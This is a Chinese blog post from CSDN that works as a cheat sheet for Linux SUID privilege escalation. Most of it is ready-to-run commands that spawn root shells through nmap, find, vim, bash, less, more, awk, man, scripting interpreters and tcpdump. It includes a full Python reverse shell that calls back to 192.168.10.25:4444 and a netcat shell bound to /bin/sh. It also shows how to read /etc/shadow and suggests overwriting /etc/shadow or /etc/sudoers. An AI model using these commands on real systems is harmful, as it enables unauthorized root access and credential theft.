Linux提权之Suid提权 小部分归纳

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量1.2k 收藏 6
点赞数 1
分类专栏: Web安全 Linux云计算运维 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/124051487
版权
Linux提权之Suid提权
SUID是linux的一种权限机制
具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权
已知的可用于提权的linux可行性文件列表如下:
Nmap
Vim
find
Bash
More
Less
Nano
cp
使用如下命令可以发现系统上运行的所有SUID可执行的文件  命令将查找具有root权限的SUID的文件 
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
1.Nmap
较旧版本的Nmap(2.02-5.21)具有交互模式 允许用户执行shell命令
由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell 
nmap -v   #查看nmap的版本
nmap --interactive   #nmap的交互模式
如下命令可以提供一个提升的shell 
nmap> !sh
sh-3.2# whoami
root
也可以通过Metasploit模块对Nmap的二进制文件进行权限提升 
use exploit/unix/local/setuid_nmap
2.Find
如果find命令也是以suid权限运行的话 那么通过find执行的 所有命令都会以root权限执行 
touch pentestlab
find pentestlab -exec whoami \;
以上也可以使用 
/usr/bin/find xbw -exec whoami \;   #xbw可以是任意的文件 这并不重要
进阶1:甚至可以用root权限身份借助python反弹shell 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  #反弹一个sh类型的shell
即: 
/usr/bin/find xbw -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
黑客kali端 
nc -lvp 4444   #监听相应端口的信息
进阶2:大部分Linux操作系统都安装了netcat 也可以被利用来提升权限到root  
通过nc把root权限反弹到其他用户上去执行root命令 
touch pentestlab
#find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
netcat 192.168.1.189 5555
cat /etc/shadow
3.VIM
vim是linux下的文本编辑器。如果以suid运行,则会继承root用户的权限,可以读取系统上的所有文件 
vim.tiny /etc/shadow
vim.tiny /etc/passwd
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
4.Bash
以下命令将以root权限打开一个bash shell 
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
5.Less
6.More
Less和More都可以执行用来提权  本质和vim一样 都是查看文件内容的 
less /etc/passwd
!/bin/sh
more /home/pelle/myfile
!/bin/bash
7.cp
使用cp覆盖 /etc/shadow
8.mv
使用mv覆盖 /etc/shadow  或者 /etc/sudoers
9.awk 
awk 'BEGIN {system("/bin/bash")}'
10.man 
man passwd
!/bin/bash
11.python/perl/ruby/lua/etc
perl 
exec "/bin/bash";
python 
import os
os.system("/bin/bash")
12.tcpdump 
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

Simon_Smith
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SUID提权
snowlyzz的博客
08-14 1766
久经不衰的SUID提权
SUID提权
一只web狗
07-01 1万+
SUID提权介绍
简谈SUID提权
最新发布
2401_84466336的博客
05-28 973
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
Linux提权SUID提权
CP1024的博客
04-04 3804
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制文件 2. 命令执行者要有二进制文件的执行权 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
一文让你深刻理解什么是suid提权
weixin_39430198的博客
03-15 7269
一、课时目标 1.理解suid的概念和作用 2.掌握linux suid提权的方法 二、思考 思考: shadow文件存放用户密码,那普通用户在没有写权限的情况下如何修改密码并更新shadow文件中的内容? 我们知道,系统中的用户密码是保存在/etc/shadow中的,普通用户可以修改自己的密码,修改完成后shadows文件中的密码也会随之更新。 回顾linux下文件权限,用户具备w写权限才能对文件内容进行修改,但明显普通用户对于shadow文件没有任何操作权限,那这个过程是如何发生的呢?原因就在于这个S
权限提升-Linux脏牛内核漏洞&SUID&信息搜集
qq_59350385的博客
05-12 644
目录 一、信息搜集 二、Linux 提权 SUID 【漏洞成因】: 【查看suid和guid文件】: 【其他命令】: 【常用提权方式】: namp: find vi/vim less more mv /cp nano awk man wget python perl tcpdump 三、内核漏洞提权演示 【靶标】 【工具】 【提权测试】 一、信息搜集 提权自动化脚本利用 两个信息收集:LinEnum,linuxpricchecker 两个漏洞..
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
Linux提权扫描脚本
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
linux提权总结8大类型,30多种方式
09-27
linux提权总结8大类型,30多种方式 小白也能看明白的提权方法,包括内核提权,服务提权 sudo提权 suid提权sgid提权 定时任务提权 nfs提权 等待
Linux下非交互式提权详解
09-15
Linux系统中,提权(Privilege Escalation)是指用户通过合法的或非法的手段获取比当前账户更高的权限,通常是从普通用户升级到root权限。在某些情况下,如网络安全审计或恶意攻击者入侵时,非交互式提权就显得尤...
深度分析linux提权SUID提权|Find提权|NMAP提权|VIM提权...
qq_60115503的博客
05-07 2812
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限,SGID与SUID相似,只是执行程序时获得的是文件属组的权限
suid提权linux
weixin_68652890的博客
04-15 980
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
Linux下用SUID提权
热门推荐
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
Linux:SUID提权
Elite的博客
03-05 2203
以find命令为例,讲解SUID提权原理
LinuxSUID提权方法
good good study
10-29 3907
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
Linux提权
qq_46258964的博客
01-07 1万+
Linux提权 Linux提权一般把提权脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地提权,没有就msf提权Linux提权自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 提权方式如下 1,Linux SUID提权 suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid提权的思路就是运行root用户所拥有的suid文件
linux suid提权
qq_73628117的博客
09-07 247
SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么该执行程序运行的时候将拥有ROOT权限。
Linux-suid提权
liver100day的博客
11-16 1367
ww
Linux提权攻略:从信息收集到内核漏洞利用
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。" 在Linux系统中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值